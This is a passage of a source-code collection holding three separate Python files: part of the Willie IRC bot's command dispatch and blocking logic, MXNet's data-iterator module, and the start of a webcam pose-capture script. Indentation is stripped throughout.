def bind_commands(self):
self.commands = {'high': {}, 'medium': {}, 'low': {}}
self.scheduler.clear_jobs()
def bind(priority, regexp, func):
# Function name is no longer used for anything, as far as I know,
# but we're going to keep it around anyway.
if not hasattr(func, 'name'):
func.name = func.__name__
def trim_docstring(doc):
"""Clean up a docstring"""
if not doc:
return []
lines = doc.expandtabs().splitlines()
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
return trimmed
doc = trim_docstring(func.__doc__)
if hasattr(func, 'commands') and func.commands[0]:
example = None
if hasattr(func, 'example'):
if isinstance(func.example, basestring):
# Support old modules that add the attribute directly.
example = func.example
else:
# The new format is a list of dicts.
example = func.example[0]["example"]
example = example.replace('$nickname', str(self.nick))
help_prefix = (self.config.core.help_prefix
or self.config.core.prefix.strip('\\'))
if example[0] != help_prefix:
example = help_prefix + example[len(help_prefix):]
if doc or example:
for command in func.commands:
self.doc[command] = (doc, example)
self.commands[priority].setdefault(regexp, []).append(func)
for func in self.callables:
if not hasattr(func, 'unblockable'):
func.unblockable = False
if not hasattr(func, 'priority'):
func.priority = 'medium'
if not hasattr(func, 'thread'):
func.thread = True
if not hasattr(func, 'event'):
func.event = ['PRIVMSG']
else:
if type(func.event) is not list:
func.event = [func.event.upper()]
else:
func.event = [event.upper() for event in func.event]
if not hasattr(func, 'rate'):
func.rate = 0
if hasattr(func, 'rule'):
rules = func.rule
if isinstance(rules, basestring):
rules = [func.rule]
if isinstance(rules, list):
for rule in rules:
pattern = self.sub(rule)
flags = re.IGNORECASE
if rule.find("\n") != -1:
flags |= re.VERBOSE
regexp = re.compile(pattern, flags)
bind(func.priority, regexp, func)
elif isinstance(func.rule, tuple):
# 1) e.g. ('$nick', '(.*)')
if len(func.rule) == 2 and isinstance(func.rule[0], str):
prefix, pattern = func.rule
prefix = self.sub(prefix)
regexp = re.compile(prefix + pattern, re.I)
bind(func.priority, regexp, func)
# 2) e.g. (['p', 'q'], '(.*)')
elif len(func.rule) == 2 and \
isinstance(func.rule[0], list):
prefix = self.config.core.prefix
commands, pattern = func.rule
for command in commands:
command = r'(%s)\b(?: +(?:%s))?' % (
command, pattern
)
regexp = re.compile(prefix + command, re.I)
bind(func.priority, regexp, func)
# 3) e.g. ('$nick', ['p', 'q'], '(.*)')
elif len(func.rule) == 3:
prefix, commands, pattern = func.rule
prefix = self.sub(prefix)
for command in commands:
command = r'(%s) +' % command
regexp = re.compile(
prefix + command + pattern, re.I
)
bind(func.priority, regexp, func)
if hasattr(func, 'commands'):
for command in func.commands:
prefix = self.config.core.prefix
regexp = get_command_regexp(prefix, command)
bind(func.priority, regexp, func)
if hasattr(func, 'interval'):
for interval in func.interval:
job = Willie.Job(interval, func)
self.scheduler.add_job(job)
class WillieWrapper(object):
def __init__(self, willie, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', willie)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def say(self, string, max_messages=1):
self._bot.msg(self._trigger.sender, string, max_messages)
def reply(self, string, notice=False):
if isinstance(string, str) and not py3:
string = string.decode('utf8')
if notice:
self.notice(
'%s: %s' % (self._trigger.nick, string),
self._trigger.sender
)
else:
self._bot.msg(
self._trigger.sender,
'%s: %s' % (self._trigger.nick, string)
)
def action(self, string, recipient=None):
if recipient is None:
recipient = self._trigger.sender
self._bot.msg(recipient, '\001ACTION %s\001' % string)
def notice(self, string, recipient=None):
if recipient is None:
recipient = self._trigger.sender
self.write(('NOTICE', recipient), string)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def call(self, func, willie, trigger):
nick = trigger.nick
if nick not in self.times:
self.times[nick] = dict()
if not trigger.admin and \
not func.unblockable and \
func.rate > 0 and \
func in self.times[nick]:
timediff = time.time() - self.times[nick][func]
if timediff < func.rate:
self.times[nick][func] = time.time()
LOGGER.info(
"%s prevented from using %s in %s: %d < %d",
trigger.nick, func.__name__, trigger.sender, timediff,
func.rate
)
return
try:
exit_code = func(willie, trigger)
except Exception:
exit_code = None
self.error(trigger)
if exit_code != module.NOLIMIT:
self.times[nick][func] = time.time()
def limit(self, trigger, func):
if trigger.sender and not trigger.sender.is_nick():
if self.config.has_section('limit'):
limits = self.config.limit.get(trigger.sender)
if limits and (func.__module__ not in limits):
return True
return False
def dispatch(self, pretrigger):
args = pretrigger.args
event, args, text = pretrigger.event, args, args[-1]
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
items = self.commands[priority].items()
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
trigger = Trigger(self.config, pretrigger, match)
wrapper = self.WillieWrapper(self, trigger)
for func in funcs:
if (not trigger.admin and
not func.unblockable and
(nick_blocked or host_blocked)):
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
if event not in func.event:
continue
if self.limit(trigger, func):
continue
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
trigger.nick,
', '.join(list_of_blocked_functions)
)
def _host_blocked(self, host):
bad_masks = self.config.core.get_list('host_blocks')
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.get_list('nick_blocks')
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
def cap_req(self, module_name, capability, failure_callback):
"""Tell Willie to request a capability when it starts.
By prefixing the capability with `-`, it will be ensured that the
        capability is not enabled. Similarly, by prefixing the capability with
`=`, it will be ensured that the capability is enabled. Requiring and
disabling is "first come, first served"; if one module requires a
capability, and another prohibits it, this function will raise an
exception in whichever module loads second. An exception will also be
raised if the module is being loaded after the bot has already started,
and the request would change the set of enabled capabilities.
If the capability is not prefixed, and no other module prohibits it, it
will be requested. Otherwise, it will not be requested. Since
capability requests that are not mandatory may be rejected by the
server, as well as by other modules, a module which makes such a
request should account for that possibility.
The actual capability request to the server is handled after the
completion of this function. In the event that the server denies a
request, the `failure_callback` function will be called, if provided.
The arguments will be a `Willie` object, and the capability which was
rejected. This can be used to disable callables which rely on the
capability.
"""
#TODO raise better exceptions
cap = capability[1:]
prefix = capability[0]
if prefix == '-':
if self.connection_registered and cap in self.enabled_capabilities:
raise Exception('Can not change capabilities after server '
'connection has been completed.')
entry = self._cap_reqs.get(cap, [])
if any((ent[0] != '-' for ent in entry)):
raise Exception('Capability conflict')
entry.append((prefix, module_name, failure_callback))
self._cap_reqs[cap] = entry
else:
if prefix != '=':
cap = capability
prefix = ''
if self.connection_registered and (cap not in
self.enabled_capabilities):
raise Exception('Can not change capabilities after server '
'connection has been completed.')
entry = self._cap_reqs.get(cap, [])
# Non-mandatory will callback at the same time as if the server
# rejected it.
if any((ent[0] == '-' for ent in entry)) and prefix == '=':
raise Exception('Capability conflict')
entry.append((prefix, module_name, failure_callback))
self._cap_reqs[cap] = entry
|
io.py
|
"""Data iterators for common data formats."""
from __future__ import absolute_import
from collections import OrderedDict, namedtuple
import sys
import ctypes
import logging
import threading
import numpy as np
from .base import _LIB
from .base import c_array, c_str, mx_uint, py_str
from .base import DataIterHandle, NDArrayHandle
from .base import mx_real_t
from .base import check_call, build_param_doc as _build_param_doc
from .ndarray import NDArray
from .ndarray import array
from .ndarray import concatenate
class DataDesc(namedtuple('DataDesc', ['name', 'shape'])):
"""Data description
Parameters
----------
cls : DataDesc
The class.
name : str
Data name.
shape : tuple of int
Data shape.
dtype : np.dtype, optional
Data type.
layout : str, optional
Data layout.
"""
def __new__(cls, name, shape, dtype=mx_real_t, layout='NCHW'):
        ret = super(DataDesc, cls).__new__(cls, name, shape)
ret.dtype = dtype
ret.layout = layout
return ret
def __repr__(self):
return "DataDesc[%s,%s,%s,%s]" % (self.name, self.shape, self.dtype,
self.layout)
@staticmethod
def get_batch_axis(layout):
"""Get the dimension that corresponds to the batch size.
When data parallelism is used, the data will be automatically split and
concatenated along the batch-size dimension. Axis can be -1, which means
the whole array will be copied for each data-parallelism device.
Parameters
----------
layout : str
layout string. For example, "NCHW".
Returns
-------
int
An axis indicating the batch_size dimension.
"""
if layout is None:
return 0
return layout.find('N')
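        # Examples (illustrative): get_batch_axis('NCHW') -> 0, get_batch_axis('TNC') -> 1,
        # get_batch_axis(None) -> 0, and a layout without 'N' -> -1 (copy to every device).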
@staticmethod
def get_list(shapes, types):
"""Get DataDesc list from attribute lists.
Parameters
----------
        shapes : a list of (name, shape) pairs
        types : a list of (name, type) pairs
"""
if types is not None:
type_dict = dict(types)
return [DataDesc(x[0], x[1], type_dict[x[0]]) for x in shapes]
else:
return [DataDesc(x[0], x[1]) for x in shapes]
class DataBatch(object):
"""A data batch.
Parameters
----------
data : list of NDArray
A list of input data.
label : list of NDArray, optional
A list of input labels.
pad : int, optional
        The number of examples padded at the batch end. It is used when the
        number of examples read is less than the batch size.
index : numpy.array, optional
The example indices in this batch.
bucket_key : int, optional
The key of the bucket, used for bucket IO.
provide_data : list of (name, shape), optional
The *i*-th elements describes the name and shape of ``data[i]``.
If not provided, the order of arg_names of the executor is assumed.
When working with Module this is the order of the data_names argument.
provide_label : list of (name, shape), optional
The *i*-th elements describes the name and shape of ``label[i]``.
If not provided, the order of arg_names of the executor is assumed.
When working with Module this is the order of the label_names argument.
"""
def __init__(self, data, label=None, pad=None, index=None,
bucket_key=None, provide_data=None, provide_label=None):
if data is not None:
assert isinstance(data, (list, tuple)), "Data must be list of NDArrays"
if label is not None:
assert isinstance(label, (list, tuple)), "Label must be list of NDArrays"
self.data = data
self.label = label
self.pad = pad
self.index = index
self.bucket_key = bucket_key
self.provide_data = provide_data
self.provide_label = provide_label
def __str__(self):
data_shapes = [d.shape for d in self.data]
label_shapes = [l.shape for l in self.label]
return "{}: data shapes: {} label shapes: {}".format(
self.__class__.__name__,
data_shapes,
label_shapes)
class DataIter(object):
"""The base class of a data iterator.
Parameters
----------
batch_size : int, optional
The batch size, namely the number of examples in a batch.
"""
def __init__(self, batch_size=0):
self.batch_size = batch_size
def __iter__(self):
return self
def reset(self):
"""Reset the iterator to the begin of the data."""
pass
def next(self):
"""Get next data batch from iterator.
Returns
-------
DataBatch
The data of next batch.
Raises
------
StopIteration
If the end of the data is reached.
"""
if self.iter_next():
return DataBatch(data=self.getdata(), label=self.getlabel(), \
pad=self.getpad(), index=self.getindex())
else:
raise StopIteration
def __next__(self):
return self.next()
def iter_next(self):
"""Move to the next batch.
Returns
-------
boolean
Whether the move is successful.
"""
pass
def getdata(self):
"""Get data of current batch.
Returns
-------
list of NDArray
The data of the current batch.
"""
pass
def getlabel(self):
"""Get label of the current batch.
Returns
-------
list of NDArray
The label of the current batch.
"""
pass
def getindex(self):
"""Get index of the current batch.
Returns
-------
index : numpy.array
The indices of examples in the current batch.
"""
return None
def getpad(self):
"""Get the number of padding examples in the current batch.
Returns
-------
int
Number of padding examples in the current batch.
"""
pass
class ResizeIter(DataIter):
"""Resize a data iterator to a given number of batches.
Parameters
----------
data_iter : DataIter
The data iterator to be resized.
size : int
The number of batches per epoch to resize to.
reset_internal : bool
Whether to reset internal iterator on ResizeIter.reset.
Examples
--------
>>> nd_iter = mx.io.NDArrayIter(mx.nd.ones((100,10)), batch_size=25)
>>> resize_iter = mx.io.ResizeIter(nd_iter, 2)
>>> for batch in resize_iter:
... print(batch.data)
[<NDArray 25x10 @cpu(0)>]
[<NDArray 25x10 @cpu(0)>]
"""
def __init__(self, data_iter, size, reset_internal=True):
super(ResizeIter, self).__init__()
self.data_iter = data_iter
self.size = size
self.reset_internal = reset_internal
self.cur = 0
self.current_batch = None
self.provide_data = data_iter.provide_data
self.provide_label = data_iter.provide_label
self.batch_size = data_iter.batch_size
if hasattr(data_iter, 'default_bucket_key'):
self.default_bucket_key = data_iter.default_bucket_key
def reset(self):
self.cur = 0
if self.reset_internal:
self.data_iter.reset()
def iter_next(self):
if self.cur == self.size:
return False
try:
self.current_batch = self.data_iter.next()
except StopIteration:
self.data_iter.reset()
self.current_batch = self.data_iter.next()
self.cur += 1
return True
def getdata(self):
return self.current_batch.data
def getlabel(self):
return self.current_batch.label
def getindex(self):
return self.current_batch.index
def getpad(self):
return self.current_batch.pad
class PrefetchingIter(DataIter):
"""Performs pre-fetch for other data iterators.
This iterator will create another thread to perform ``iter_next`` and then
store the data in memory. It potentially accelerates the data read, at the
cost of more memory usage.
Parameters
----------
iters : DataIter or list of DataIter
The data iterators to be pre-fetched.
rename_data : None or list of dict
The *i*-th element is a renaming map for the *i*-th iter, in the form of
{'original_name' : 'new_name'}. Should have one entry for each entry
in iter[i].provide_data.
rename_label : None or list of dict
Similar to ``rename_data``.
Examples
--------
>>> iter1 = mx.io.NDArrayIter({'data':mx.nd.ones((100,10))}, batch_size=25)
>>> iter2 = mx.io.NDArrayIter({'data':mx.nd.ones((100,10))}, batch_size=25)
>>> piter = mx.io.PrefetchingIter([iter1, iter2],
... rename_data=[{'data': 'data_1'}, {'data': 'data_2'}])
>>> print(piter.provide_data)
[DataDesc[data_1,(25, 10L),<type 'numpy.float32'>,NCHW],
DataDesc[data_2,(25, 10L),<type 'numpy.float32'>,NCHW]]
"""
def __init__(self, iters, rename_data=None, rename_label=None):
super(PrefetchingIter, self).__init__()
if not isinstance(iters, list):
iters = [iters]
self.n_iter = len(iters)
assert self.n_iter > 0
self.iters = iters
self.rename_data = rename_data
self.rename_label = rename_label
self.batch_size = self.provide_data[0][1][0]
self.data_ready = [threading.Event() for i in range(self.n_iter)]
self.data_taken = [threading.Event() for i in range(self.n_iter)]
for i in self.data_taken:
i.set()
self.started = True
self.current_batch = [None for i in range(self.n_iter)]
self.next_batch = [None for i in range(self.n_iter)]
def prefetch_func(self, i):
"""Thread entry"""
while True:
self.data_taken[i].wait()
if not self.started:
break
try:
self.next_batch[i] = self.iters[i].next()
except StopIteration:
self.next_batch[i] = None
self.data_taken[i].clear()
self.data_ready[i].set()
self.prefetch_threads = [threading.Thread(target=prefetch_func, args=[self, i]) \
for i in range(self.n_iter)]
for thread in self.prefetch_threads:
thread.setDaemon(True)
thread.start()
def __del__(self):
self.started = False
for i in self.data_taken:
i.set()
for thread in self.prefetch_threads:
thread.join()
@property
def provide_data(self):
if self.rename_data is None:
return sum([i.provide_data for i in self.iters], [])
else:
return sum([[
DataDesc(r[x.name], x.shape, x.dtype)
if isinstance(x, DataDesc) else DataDesc(*x)
for x in i.provide_data
] for r, i in zip(self.rename_data, self.iters)], [])
@property
def provide_label(self):
if self.rename_label is None:
return sum([i.provide_label for i in self.iters], [])
else:
return sum([[
DataDesc(r[x.name], x.shape, x.dtype)
if isinstance(x, DataDesc) else DataDesc(*x)
for x in i.provide_label
] for r, i in zip(self.rename_label, self.iters)], [])
def reset(self):
for i in self.data_ready:
i.wait()
for i in self.iters:
i.reset()
for i in self.data_ready:
i.clear()
for i in self.data_taken:
i.set()
def iter_next(self):
for i in self.data_ready:
i.wait()
if self.next_batch[0] is None:
for i in self.next_batch:
assert i is None, "Number of entry mismatches between iterators"
return False
else:
for batch in self.next_batch:
assert batch.pad == self.next_batch[0].pad, \
"Number of entry mismatches between iterators"
self.current_batch = DataBatch(sum([batch.data for batch in self.next_batch], []),
sum([batch.label for batch in self.next_batch], []),
self.next_batch[0].pad,
self.next_batch[0].index,
provide_data=self.provide_data,
provide_label=self.provide_label)
for i in self.data_ready:
i.clear()
for i in self.data_taken:
i.set()
return True
def next(self):
if self.iter_next():
return self.current_batch
else:
raise StopIteration
def getdata(self):
return self.current_batch.data
def getlabel(self):
return self.current_batch.label
def getindex(self):
return self.current_batch.index
def getpad(self):
return self.current_batch.pad
def _init_data(data, allow_empty, default_name):
"""Convert data into canonical form."""
assert (data is not None) or allow_empty
if data is None:
data = []
if isinstance(data, (np.ndarray, NDArray)):
data = [data]
if isinstance(data, list):
if not allow_empty:
assert(len(data) > 0)
if len(data) == 1:
data = OrderedDict([(default_name, data[0])]) # pylint: disable=redefined-variable-type
else:
data = OrderedDict( # pylint: disable=redefined-variable-type
[('_%d_%s' % (i, default_name), d) for i, d in enumerate(data)])
if not isinstance(data, dict):
raise TypeError("Input must be NDArray, numpy.ndarray, " + \
"a list of them or dict with them as values")
for k, v in data.items():
if not isinstance(v, NDArray):
try:
data[k] = array(v)
except:
raise TypeError(("Invalid type '%s' for %s, " % (type(v), k)) + \
"should be NDArray or numpy.ndarray")
return list(data.items())
class NDArrayIter(DataIter):
"""Iterating on either ``mx.nd.NDArray`` or ``numpy.ndarray``.
Parameters
----------
data: array or list of array or dict of string to array
Input data
label: array or list of array or dict of string to array, optional
Input label
batch_size: int
Batch Size
shuffle: bool, optional
Whether to shuffle the data
last_batch_handle : str, optional
How to handle the last batch, can be 'pad', 'discard' or
'roll_over'. 'roll_over' is intended for training and can cause problems
if used for prediction.
data_name : str, optional
The data name
label_name : str, optional
The label name
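    Examples
    --------
    A minimal sketch (the arrays below are illustrative only):
    >>> data = mx.nd.ones((100, 10))
    >>> label = mx.nd.zeros((100,))
    >>> nd_iter = mx.io.NDArrayIter(data, label, batch_size=25, shuffle=True)
    >>> for batch in nd_iter:
    ...     pass  # batch.data[0] has shape (25, 10); batch.label[0] has shape (25,)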
"""
def __init__(self, data, label=None, batch_size=1, shuffle=False,
last_batch_handle='pad', data_name='data',
label_name='softmax_label'):
super(NDArrayIter, self).__init__(batch_size)
self.data = _init_data(data, allow_empty=False, default_name=data_name)
self.label = _init_data(label, allow_empty=True, default_name=label_name)
# shuffle data
if shuffle:
idx = np.arange(self.data[0][1].shape[0])
np.random.shuffle(idx)
self.data = [(k, array(v.asnumpy()[idx], v.context)) for k, v in self.data]
self.label = [(k, array(v.asnumpy()[idx], v.context)) for k, v in self.label]
# batching
if last_batch_handle == 'discard':
new_n = self.data[0][1].shape[0] - self.data[0][1].shape[0] % batch_size
data_dict = OrderedDict(self.data)
label_dict = OrderedDict(self.label)
for k, _ in self.data:
data_dict[k] = data_dict[k][:new_n]
for k, _ in self.label:
label_dict[k] = label_dict[k][:new_n]
            self.data = list(data_dict.items())
            self.label = list(label_dict.items())
self.data_list = [x[1] for x in self.data] + [x[1] for x in self.label]
self.num_source = len(self.data_list)
self.num_data = self.data_list[0].shape[0]
assert self.num_data >= batch_size, \
"batch_size need to be smaller than data size."
self.cursor = -batch_size
self.batch_size = batch_size
self.last_batch_handle = last_batch_handle
@property
def provide_data(self):
"""The name and shape of data provided by this iterator."""
return [
DataDesc(k, tuple([self.batch_size] + list(v.shape[1:])), v.dtype)
for k, v in self.data
]
@property
def provide_label(self):
"""The name and shape of label provided by this iterator."""
return [
DataDesc(k, tuple([self.batch_size] + list(v.shape[1:])), v.dtype)
for k, v in self.label
]
def hard_reset(self):
"""Ignore roll over data and set to start."""
self.cursor = -self.batch_size
def reset(self):
if self.last_batch_handle == 'roll_over' and self.cursor > self.num_data:
self.cursor = -self.batch_size + (self.cursor%self.num_data)%self.batch_size
else:
self.cursor = -self.batch_size
def iter_next(self):
self.cursor += self.batch_size
return self.cursor < self.num_data
def next(self):
if self.iter_next():
return DataBatch(data=self.getdata(), label=self.getlabel(), \
pad=self.getpad(), index=None)
else:
raise StopIteration
def _getdata(self, data_source):
"""Load data from underlying arrays, internal use only."""
assert(self.cursor < self.num_data), "DataIter needs reset."
if self.cursor + self.batch_size <= self.num_data:
return [x[1][self.cursor:self.cursor+self.batch_size] for x in data_source]
else:
pad = self.batch_size - self.num_data + self.cursor
return [concatenate([x[1][self.cursor:], x[1][:pad]]) for x in data_source]
def getdata(self):
return self._getdata(self.data)
def getlabel(self):
return self._getdata(self.label)
def getpad(self):
if self.last_batch_handle == 'pad' and \
self.cursor + self.batch_size > self.num_data:
return self.cursor + self.batch_size - self.num_data
else:
return 0
class MXDataIter(DataIter):
"""A python wrapper a C++ data iterator.
Parameters
----------
handle : DataIterHandle
The handle to the underlying C++ Data Iterator.
"""
def __init__(self, handle, data_name='data', label_name='softmax_label', **_):
super(MXDataIter, self).__init__()
self.handle = handle
# debug option, used to test the speed with io effect eliminated
self._debug_skip_load = False
# load the first batch to get shape information
self.first_batch = None
self.first_batch = self.next()
data = self.first_batch.data[0]
label = self.first_batch.label[0]
# properties
self.provide_data = [DataDesc(data_name, data.shape, data.dtype)]
self.provide_label = [DataDesc(label_name, label.shape, label.dtype)]
self.batch_size = data.shape[0]
def __del__(self):
check_call(_LIB.MXDataIterFree(self.handle))
def debug_skip_load(self):
# Set the iterator to simply return always first batch. This can be used
# to test the speed of network without taking the loading delay into
# account.
self._debug_skip_load = True
logging.info('Set debug_skip_load to be true, will simply return first batch')
def reset(self):
self._debug_at_begin = True
self.first_batch = None
check_call(_LIB.MXDataIterBeforeFirst(self.handle))
def next(self):
if self._debug_skip_load and not self._debug_at_begin:
return DataBatch(data=[self.getdata()], label=[self.getlabel()], pad=self.getpad(),
index=self.getindex())
if self.first_batch is not None:
batch = self.first_batch
self.first_batch = None
return batch
self._debug_at_begin = False
next_res = ctypes.c_int(0)
check_call(_LIB.MXDataIterNext(self.handle, ctypes.byref(next_res)))
if next_res.value:
return DataBatch(data=[self.getdata()], label=[self.getlabel()], pad=self.getpad(),
index=self.getindex())
else:
raise StopIteration
def iter_next(self):
if self.first_batch is not None:
return True
next_res = ctypes.c_int(0)
check_call(_LIB.MXDataIterNext(self.handle, ctypes.byref(next_res)))
return next_res.value
def getdata(self):
hdl = NDArrayHandle()
check_call(_LIB.MXDataIterGetData(self.handle, ctypes.byref(hdl)))
return NDArray(hdl, False)
def getlabel(self):
hdl = NDArrayHandle()
check_call(_LIB.MXDataIterGetLabel(self.handle, ctypes.byref(hdl)))
return NDArray(hdl, False)
def getindex(self):
index_size = ctypes.c_uint64(0)
index_data = ctypes.POINTER(ctypes.c_uint64)()
check_call(_LIB.MXDataIterGetIndex(self.handle,
ctypes.byref(index_data),
ctypes.byref(index_size)))
address = ctypes.addressof(index_data.contents)
dbuffer = (ctypes.c_uint64* index_size.value).from_address(address)
np_index = np.frombuffer(dbuffer, dtype=np.uint64)
return np_index.copy()
def getpad(self):
pad = ctypes.c_int(0)
check_call(_LIB.MXDataIterGetPadNum(self.handle, ctypes.byref(pad)))
return pad.value
def _make_io_iterator(handle):
"""Create an io iterator by handle."""
name = ctypes.c_char_p()
desc = ctypes.c_char_p()
num_args = mx_uint()
arg_names = ctypes.POINTER(ctypes.c_char_p)()
arg_types = ctypes.POINTER(ctypes.c_char_p)()
arg_descs = ctypes.POINTER(ctypes.c_char_p)()
check_call(_LIB.MXDataIterGetIterInfo( \
handle, ctypes.byref(name), ctypes.byref(desc), \
ctypes.byref(num_args), \
ctypes.byref(arg_names), \
ctypes.byref(arg_types), \
ctypes.byref(arg_descs)))
iter_name = py_str(name.value)
narg = int(num_args.value)
param_str = _build_param_doc(
[py_str(arg_names[i]) for i in range(narg)],
[py_str(arg_types[i]) for i in range(narg)],
[py_str(arg_descs[i]) for i in range(narg)])
doc_str = ('%s\n\n' +
'%s\n' +
'Returns\n' +
'-------\n' +
'MXDataIter\n'+
' The result iterator.')
doc_str = doc_str % (desc.value, param_str)
def creator(*args, **kwargs):
"""Create an iterator.
The parameters listed below can be passed in as keyword arguments.
Parameters
----------
name : string, required.
Name of the resulting data iterator.
Returns
-------
dataiter: Dataiter
The resulting data iterator.
"""
param_keys = []
param_vals = []
for k, val in kwargs.items():
param_keys.append(c_str(k))
param_vals.append(c_str(str(val)))
# create atomic symbol
param_keys = c_array(ctypes.c_char_p, param_keys)
param_vals = c_array(ctypes.c_char_p, param_vals)
iter_handle = DataIterHandle()
check_call(_LIB.MXDataIterCreateIter(
handle,
mx_uint(len(param_keys)),
param_keys, param_vals,
ctypes.byref(iter_handle)))
if len(args):
raise TypeError('%s can only accept keyword arguments' % iter_name)
return MXDataIter(iter_handle, **kwargs)
creator.__name__ = iter_name
creator.__doc__ = doc_str
return creator
def _init_io_module():
"""List and add all the data iterators to current module."""
plist = ctypes.POINTER(ctypes.c_void_p)()
size = ctypes.c_uint()
check_call(_LIB.MXListDataIters(ctypes.byref(size), ctypes.byref(plist)))
module_obj = sys.modules[__name__]
for i in range(size.value):
hdl = ctypes.c_void_p(plist[i])
dataiter = _make_io_iterator(hdl)
setattr(module_obj, dataiter.__name__, dataiter)
_init_io_module()
|
movementSampler2.py
|
#!/usr/bin/env python3.5
import argparse
import logging
import time
import cv2
import numpy as np
import tensorflow as tf
from tf_pose import common
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
import datetime
from threading import Thread
import pickle
import io
# This file (run_webcam.py) has been heavily modified to capture
# and store standard pose data for further machine learning.
class WebcamVideoStream:
def __init__(self, capture):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = capture
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
# define binary data
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
# define integer data
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
# define float data
def _float32_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
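# Usage sketch (hedged): these helpers are the usual building blocks for packing a
# sample into a tf.train.Example (e.g. when writing TFRecords); the feature names
# and variables below are illustrative only.
#   example = tf.train.Example(features=tf.train.Features(feature={
#       'pose': _float32_feature(flat_coords),   # list of floats
#       'label': _int64_feature(label),          # single int
#   }))
#   tfrecord_writer.write(example.SerializeToString())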
logger = logging.getLogger('TfPoseEstimator-WebCam')
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def textCountdown(t, mString):
progressBar = '>>>>>>>>>'
while t:
print(progressBar + mString + str(t))
time.sleep(1)
t -= 1
progressBar += '>>>>>>>>>'
def captureImage(recordTypeNum, recording_time,recording_interval, vs, imageList):
recordTypes = ['000 GOOD MOVES 000','111 BAD MOVES 111']
recordTypeString = recordTypes[recordTypeNum]
textCountdown(3, 'Capture session' + recordTypeString +' start in :' )
start_time = time.time()
while True:
if ((time.time() - start_time) >= recording_time):
print('Time up!')
break
else:
image = vs.read()
            group_index = int(np.floor((time.time() - start_time) / recording_interval))
            # clamp in case the loop overshoots recording_time by a fraction of a second
            group_index = min(group_index, len(imageList) - 1)
            print('adding image to group:' + str(group_index))
            imageList[group_index] += [image]
# cv2.putText(image,str(len(HumanFrames)),(10, 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
cv2.imshow('tf-pose-estimation result', image)
image = None
if cv2.waitKey(1) == 27:
break
cv2.waitKey(10)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='tf-pose-estimation realtime webcam')
parser.add_argument('--camera', type=int, default=0)
parser.add_argument('--resize', type=str, default='304x224',
help='if provided, resize images before they are processed. default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')
parser.add_argument('--resize-out-ratio', type=float, default=4.0,
help='if provided, resize heatmaps before they are post-processed. default=1.0')
parser.add_argument('--model', type=str, default='mobilenet_thin', help='cmu / mobilenet_thin')
parser.add_argument('--show-process', type=bool, default=False,
help='for debug purpose, if enabled, speed for inference is dropped.')
args = parser.parse_args()
logger.debug('initialization %s : %s' % (args.model, get_graph_path(args.model)))
w, h = model_wh(args.resize)
if w > 0 and h > 0:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h))
else:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368))
logger.debug('cam read+')
cam = cv2.VideoCapture(args.camera)
print("WebcamVideoStream instance 'vs' is created")
vs = WebcamVideoStream(cam).start()
#frameNumber = 0
goodSampleSize = 5
badSampleSize = 5
recording_time = 4.0
recording_interval = 0.2
groupNumber = np.floor(recording_time / recording_interval)
imageSetGood = []
imageSetBad = []
dataSet = []
exerciseName = 'torsoTwist'
for i in range(int(groupNumber)):
imageSetGood.append([])
